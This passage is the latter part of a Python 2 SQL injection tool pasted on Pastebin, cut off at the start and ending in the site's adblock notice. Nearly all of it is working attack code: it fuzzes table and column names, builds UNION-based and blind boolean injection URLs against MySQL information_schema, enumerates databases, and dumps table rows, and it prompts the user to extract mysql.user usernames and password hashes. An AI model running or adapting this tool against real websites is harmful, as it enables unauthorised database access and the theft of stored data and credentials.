  679.                                     head_URL = head_URL.replace(",0x3a,0x6461726b63306465)","")
  680.                                     print "[!]",head_URL;file.write("\n[!] "+head_URL)
  681.         else:
  682.                 print "\n[-] Load_File Fuzzer has been by skipped!\n[-] Load_File disabled on this target!"
  683.                 file.write("\n\n[-] Load_File Fuzzer has been by skipped!\n[-] Load_File disabled on this target!")        
  684.  
  685. #Fuzz table/columns
  686. if mode == "--fuzz":
  687.         fuzz_tables = open(tablefuzz, "r").readlines()
  688.         fuzz_columns = open(columnfuzz, "r").readlines()
  689.         print "[+] Beginning table and column fuzzer...";file.write("[+] Beginning table and column fuzzer...")
  690.         print "[+] Number of tables names to be fuzzed:",len(fuzz_tables);file.write("\n[+] Number of tables names to be fuzzed: "+str(len(fuzz_tables)))
  691.         print "[+] Number of column names to be fuzzed:",len(fuzz_columns);file.write("\n[+] Number of column names to be fuzzed: "+str(len(fuzz_columns)))
  692.         print "[+] Searching for tables and columns...";file.write("\n[+] Searching for tables and columns...")
  693.         if arg_blind == "--blind":
  694.                 fuzz_URL = site+"+and+(SELECT+1+from+TABLE+limit+0,1)=1"
  695.         else:
  696.                 fuzz_URL = site.replace("darkc0de","0x"+"darkc0de".encode("hex"))+"+FROM+TABLE"+arg_end
  697.         for table in fuzz_tables:
  698.                 table = table.rstrip("\n")
  699.                 table_URL = fuzz_URL.replace("TABLE",table)
  700.                 source = GetThatShit(table_URL)
  701.                 if arg_blind == "--blind":
  702.                         match = re.findall(arg_string,source)
  703.                 else:
  704.                         match = re.findall("darkc0de", source);
  705.                 if len(match) > 0:
  706.                         print "\n[!] Found a table called:",table;file.write("\n\n[+] Found a table called: "+str(table))
  707.                         print "\n[+] Now searching for columns inside table \""+table+"\"";file.write("\n\n[+] Now searching for columns inside table \""+str(table)+"\"")
  708.                         if arg_blind == "--blind":
  709.                                 table_URL = site+"+and+(SELECT+substring(concat(1,COLUMN),1,1)+from+"+table+"+limit+0,1)=1"
  710.                         for column in fuzz_columns:
  711.                                 column = column.rstrip("\n")
  712.                                 if arg_blind == "--blind":
  713.                                         column_URL = table_URL.replace("COLUMN",column)
  714.                                 else:
  715.                                         column_URL = table_URL.replace("0x6461726b63306465","concat(0x6461726b63306465,0x3a,"+column+")")
  716.                                 source = GetThatShit(column_URL)
  717.                                 if arg_blind == "--blind":
  718.                                         match = re.findall(arg_string,source)    
  719.                                 else:
  720.                                         match = re.findall("darkc0de",source)
  721.                                 if len(match) > 0:
  722.                                         print "[!] Found a column called:",column;file.write("\n[!] Found a column called:"+column)
  723.                         print "[-] Done searching inside table \""+table+"\" for columns!";file.write("\n[-] Done searching inside table \""+str(table)+"\" for columns!")
  724.  
  725. #Build URLS for each different mode
  726. if mode == "--schema":
  727.     if arg_database != "None" and arg_table == "None":
  728.                 if arg_blind == "--blind":
  729.                         print "[+] Showing Tables from database \""+arg_database+"\"";file.write("\n[+] Showing Tables from database \""+arg_database+"\"")
  730.                         count_URL = site+"+and+((SELECT+COUNT(table_name)"
  731.                         count_URL += "+FROM+information_schema.TABLES+WHERE+table_schema=0x"+arg_database.encode("hex")+"))"
  732.                         line_URL = site+"+and+ascii(substring((SELECT+table_name"
  733.                         line_URL += "+FROM+information_schema.TABLES+WHERE+table_schema=0x"+arg_database.encode("hex")
  734.                 else:
  735.                         print "[+] Showing Tables & Columns from database \""+arg_database+"\""
  736.                         file.write("\n[+] Showing Tables & Columns from database \""+arg_database+"\"")
  737.                         line_URL = site.replace("darkc0de","concat(0x1e,0x1e,table_schema,0x1e,table_name,0x1e,column_name,0x1e,0x20)")
  738.                         line_URL += "+FROM+information_schema.columns+WHERE+table_schema=0x"+arg_database.encode("hex")
  739.                         count_URL = site.replace("darkc0de","concat(0x1e,0x1e,COUNT(table_schema),0x1e,0x20)")
  740.                         count_URL += "+FROM+information_schema.tables+WHERE+table_schema=0x"+arg_database.encode("hex")
  741.                 arg_row = "Tables"
  742.         if arg_database != "None" and arg_table != "None":
  743.                 if arg_blind == "--blind":
  744.                         print "[+] Showing Columns from database \""+arg_database+"\" and Table \""+arg_table+"\""
  745.                         file.write("\n[+] Showing Columns from database \""+arg_database+"\" and Table \""+arg_table+"\"")
  746.                         count_URL = site+"+and+((SELECT+COUNT(column_name)"
  747.                         count_URL += "+FROM+information_schema.COLUMNS+WHERE+table_schema=0x"+arg_database.encode("hex")+"+AND+table_name+=+0x"+arg_table.encode("hex")+"))"
  748.                         line_URL = site+"+and+ascii(substring((SELECT+column_name"
  749.                         line_URL += "+FROM+information_schema.COLUMNS+WHERE+table_schema=0x"+arg_database.encode("hex")+"+AND+table_name+=+0x"+arg_table.encode("hex")
  750.                 else:
  751.                         print "[+] Showing Columns from Database \""+arg_database+"\" and Table \""+arg_table+"\""
  752.                         file.write("\n[+] Showing Columns from database \""+arg_database+"\" and Table \""+arg_table+"\"")
  753.                         line_URL = site.replace("darkc0de","concat(0x1e,0x1e,table_schema,0x1e,table_name,0x1e,column_name,0x1e,0x20)")
  754.                         line_URL += "+FROM+information_schema.COLUMNS+WHERE+table_schema=0x"+arg_database.encode("hex")+"+AND+table_name+=+0x"+arg_table.encode("hex")
  755.                         count_URL = site.replace("darkc0de","concat(0x1e,0x1e,COUNT(*),0x1e,0x20)")
  756.                         count_URL += "+FROM+information_schema.COLUMNS+WHERE+table_schema=0x"+arg_database.encode("hex")+"+AND+table_name+=+0x"+arg_table.encode("hex")
  757.         arg_row = "Columns"
  758.  
  759. elif mode == "--dump":                
  760.     print "[+] Dumping data from database \""+str(arg_database)+"\" Table \""+str(arg_table)+"\""
  761.     file.write("\n[+] Dumping data from database \""+str(arg_database)+"\" Table \""+str(arg_table)+"\"")
  762.         print "[+] and Column(s) "+str(arg_columns);file.write("\n[+] Column(s) "+str(arg_columns))
  763.         if arg_blind == "--blind":
  764.                 darkc0de = ""
  765.                 for column in arg_columns:
  766.                         darkc0de += column+",0x3a,"
  767.                 darkc0de = darkc0de.rstrip("0x3a,")
  768.                 count_URL = site+"+and+((SELECT+COUNT(*)+FROM+"+arg_database+"."+arg_table
  769.                 line_URL = site+"+and+ascii(substring((SELECT+concat("+darkc0de+")+FROM+"+arg_database+"."+arg_table
  770.         else:
  771.                 for column in arg_columns:
  772.                         darkc0de += column+",0x1e,"
  773.                 count_URL = site.replace("darkc0de","concat(0x1e,0x1e,COUNT(*),0x1e,0x20)")+"+FROM+"+arg_database+"."+arg_table
  774.                 line_URL = site.replace("darkc0de",darkc0de+"0x1e,0x20)")+"+FROM+"+arg_database+"."+arg_table
  775.         if arg_where != "" or arg_orderby != "":
  776.                 if arg_where != "":
  777.                         arg_where = arg_where.split(",")
  778.                         print "[+] WHERE clause:","\""+arg_where[0]+"="+arg_where[1]+"\""
  779.                         arg_where = "WHERE+"+arg_where[0]+"="+"0x"+arg_where[1].encode("hex")
  780.                 if arg_orderby != "":
  781.                         arg_orderby = "ORDER+BY+'"+arg_orderby+"'"
  782.                         print "[+] ORDERBY clause:",arg_orderby
  783.                 count_URL += "+"+arg_where
  784.                 line_URL += "+"+arg_where+"+"+arg_orderby
  785.         if version[0] == 4:
  786.                 count_URL = site.replace("darkc0de","concat(0x1e,0x1e,COUNT(*),0x1e,0x20)")+"+FROM+"+arg_table
  787.             line_URL = site.replace("darkc0de",darkc0de+"0x1e,0x20)")+"+FROM+"+arg_table
  788.  
  789. elif mode == "--full":
  790.     print "[+] Starting full SQLi information_schema enumeration..."
  791.     line_URL = site.replace("darkc0de","concat(0x1e,0x1e,table_schema,0x1e,table_name,0x1e,column_name,0x1e,0x20)")
  792.     line_URL += "+FROM+information_schema.columns+WHERE+table_schema!=0x"+"information_schema".encode("hex")
  793.         count_URL = site.replace("darkc0de","concat(0x1e,0x1e,COUNT(*),0x1e,0x20)")
  794.         count_URL += "+FROM+information_schema.columns+WHERE+table_schema!=0x"+"information_schema".encode("hex")
  795.        
  796. elif mode == "--dbs":
  797.     print "[+] Showing all databases current user has access too!"
  798.     file.write("\n[+] Showing all databases current user has access too!")
  799.         if arg_blind == "--blind":
  800.                 count_URL = site+"+and+((SELECT+COUNT(schema_name)"
  801.                 count_URL += "+FROM+information_schema.schemata+where+schema_name+!=+0x"+"information_schema".encode("hex")+"))"
  802.                 line_URL = site+"+and+ascii(substring((SELECT+schema_name"
  803.                 line_URL += "+from+information_schema.schemata+where+schema_name+!=+0x"+"information_schema".encode("hex")
  804.         else:
  805.                 count_URL = site.replace("darkc0de","concat(0x1e,0x1e,COUNT(*),0x1e,0x20)")
  806.                 count_URL += "+FROM+information_schema.schemata+WHERE+schema_name!=0x"+"information_schema".encode("hex")
  807.                 line_URL = site.replace("darkc0de","concat(0x1e,0x1e,schema_name,0x1e,0x20)")
  808.                 line_URL += "+FROM+information_schema.schemata+WHERE+schema_name!=0x"+"information_schema".encode("hex")
  809.     arg_row = "Databases"
  810.  
  811. if arg_blind == "--blind":
  812.         count_URL+="))"
  813.         line_URL+="+LIMIT+"
  814. else:
  815.         count_URL += arg_end
  816.         line_URL += "+LIMIT+NUM,1"+arg_end
  817.        
  818. ## Blind Info --- I know it doesnt make sence where this code is.. but.. fuck it...
  819. if mode == "--info" and arg_blind == "--blind":
  820.         head_URL = site+"+and+(SELECT+1+from+mysql.user+limit+0,1)=1"
  821.         source = GetThatShit(head_URL)
  822.         match = re.findall(arg_string,source)
  823.         if len(match) >= 1:
  824.                 yesno = "YES <-- w00t w00t\n[!] Retrieve Info: --dump -D mysql -T user -C user,password"
  825.         else:
  826.                 yesno = "NO"
  827.         print "\n[+] Do we have Access to MySQL Database:",yesno;file.write("\n\n[+] Do we have Access to MySQL Database: "+str(yesno))
  828.         print "\n[+] Showing database version, username@location, and database name!"
  829.     file.write("\n\n[+] Showing database version, username@location, and database name!")
  830.     line_URL = site+"+and+ascii(substring((SELECT+concat(version(),0x3a,user(),0x3a,database())),"
  831.         row_value = 1
  832.  
  833. #Lets Count how many rows or columns
  834. if mode == "--schema" or mode == "--dump" or mode == "--dbs" or mode == "--full":
  835.         if arg_blind == "--blind":
  836.                 row_value = GuessValue(count_URL)
  837.         else:
  838.                 source = GetThatShit(count_URL)
  839.                 match = re.findall("\x1e\x1e\S+",source)
  840.                 match = match[0][2:].split("\x1e")
  841.                 row_value = match[0]
  842.         print "[+] Number of "+arg_row+": "+str(row_value);file.write("\n[+] Number of "+arg_row+": "+str(row_value)+"\n")
  843.  
  844. ## UNION Schema Enumeration and DataExt loop
  845. if arg_blind == "--union":
  846.         if mode == "--schema" or mode == "--dump" or mode == "--dbs" or mode == "--full":
  847.                 while int(table_num) != int(row_value):
  848.                         try:
  849.                                 source = GetThatShit(line_URL.replace("NUM",str(num)))
  850.                                 match = re.findall("\x1e\x1e\S+",source)
  851.                                 if len(match) >= 1:
  852.                                         if mode == "--schema" or mode == "--full":
  853.                                                 match = match[0][2:].split("\x1e")
  854.                                                 if cur_db != match[0]:         
  855.                                                         cur_db = match[0]
  856.                                                         if table_num == 0:
  857.                                                                 print "\n[Database]: "+match[0];file.write("\n[Database]: "+match[0]+"\n")
  858.                                                         else:
  859.                                                                 print "\n\n[Database]: "+match[0];file.write("\n\n[Database]: "+match[0]+"\n")
  860.                                                         print "[Table: Columns]";file.write("[Table: Columns]\n")
  861.                                                 if cur_table != match[1]:
  862.                                                         print "\n["+str(table_num+1)+"]"+match[1]+": "+match[2],
  863.                                                         file.write("\n["+str(table_num+1)+"]"+match[1]+": "+match[2])
  864.                                                         cur_table = match[1]
  865.                                                         #table_num+=1
  866.                                                         table_num = int(table_num) + 1
  867.                                                 else:
  868.                                                         sys.stdout.write(",%s" % (match[2]))
  869.                                                         file.write(","+match[2])
  870.                                                         sys.stdout.flush()
  871.                                         #Gathering Databases only
  872.                                         elif mode == "--dbs":                                        
  873.                                                 match = match[0]
  874.                                                 if table_num == 0:
  875.                                                         print "\n["+str(num+1)+"]",match;file.write("\n["+str(num+1)+"]"+str(match))
  876.                                                 else:
  877.                                                         print "["+str(num+1)+"]",match;file.write("\n["+str(num+1)+"]"+str(match))
  878.                                                 table_num+=1
  879.                                         #Collect data from tables & columns
  880.                                         elif mode == "--dump":
  881.                                                 match = re.findall("\x1e\x1e+.+\x1e\x1e",source)
  882.                                                 if match == []:
  883.                                                         match = ['']
  884.                                                 else:
  885.                                                         match = match[0].strip("\x1e").split("\x1e")
  886.                                                 if arg_rowdisp == 1:
  887.                                                         print "\n["+str(num+1)+"] ",;file.write("\n["+str(num+1)+"] ",)
  888.                                                 else:
  889.                                                         print;file.write("\n")
  890.                                                 for ddata in match:
  891.                                                         if ddata == "":
  892.                                                                 ddata = "NoDataInColumn"
  893.                                                         sys.stdout.write("%s:" % (ddata))
  894.                                                         file.write("%s:" % ddata)
  895.                                                         sys.stdout.flush()
  896.                                                 table_num+=1
  897.                                 else:
  898.                                         if mode == "--dump":
  899.                                                 table_num+=1
  900.                                                 sys.stdout.write("\n[%s] No data" % (num))
  901.                                                 file.write("\n[%s] No data" % (num))
  902.                                         break
  903.                                 num+=1
  904.                         except (KeyboardInterrupt, SystemExit):
  905.                                 raise
  906.                         except:
  907.                                 pass
  908.  
  909. ## Blind Schema Enumeration and DataExt loop
  910. if arg_blind == "--blind":
  911.         if mode == "--schema" or mode == "--dbs" or mode == "--dump" or mode == "--info":
  912.                 lower_bound = 0
  913.                 upper_bound = 127
  914.                 print
  915.                 for data_row in range(int(num), row_value):
  916.                         sys.stdout.write("[%s]: " % (lim_num))
  917.                         file.write("\n[%s]: " % (lim_num))
  918.                         sys.stdout.flush()
  919.                         value = chr(upper_bound)
  920.                         while value != chr(0):
  921.                                 if mode == "--info":
  922.                                         Guess_URL = line_URL + str(let_pos)+",1))"
  923.                                 else:
  924.                                         Guess_URL = line_URL + str(lim_num) +",1),"+str(let_pos)+",1))"
  925.                                 value = chr(GuessValue(Guess_URL))
  926.                                 sys.stdout.write("%s" % (value))
  927.                                 file.write(value)
  928.                                 sys.stdout.flush()
  929.                                 let_pos+=1
  930.                         print
  931.                         lim_num = int(lim_num) + 1
  932.                         let_pos = 1
  933.                         data_row+=1
  934.  
  935. #Lets wrap it up!
  936. if mode == "--schema" or mode == "--full" or mode == "--dump":
  937.         print "\n\n[-] %s" % time.strftime("%X");file.write("\n\n[-] [%s]" % time.strftime("%X"))
  938. else:
  939.         print "\n[-] %s" % time.strftime("%X");file.write("\n\n[-] [%s]" % time.strftime("%X"))
  940. print "[-] Total URL Requests:",gets;file.write("\n[-] Total URL Requests: "+str(gets))
  941. print "[-] Done\n";file.write("\n[-] Done\n")
  942. print "Don't forget to check", logfile,"\n"
  943. file.close()
RAW Paste Data

Adblocker detected! Please consider disabling it...

We've detected AdBlock Plus or some other adblocking software preventing Pastebin.com from fully loading.

We don't have any obnoxious sound, or popup ads, we actively block these annoying types of ads!

Please add Pastebin.com to your ad blocker whitelist or disable your adblocking software.

×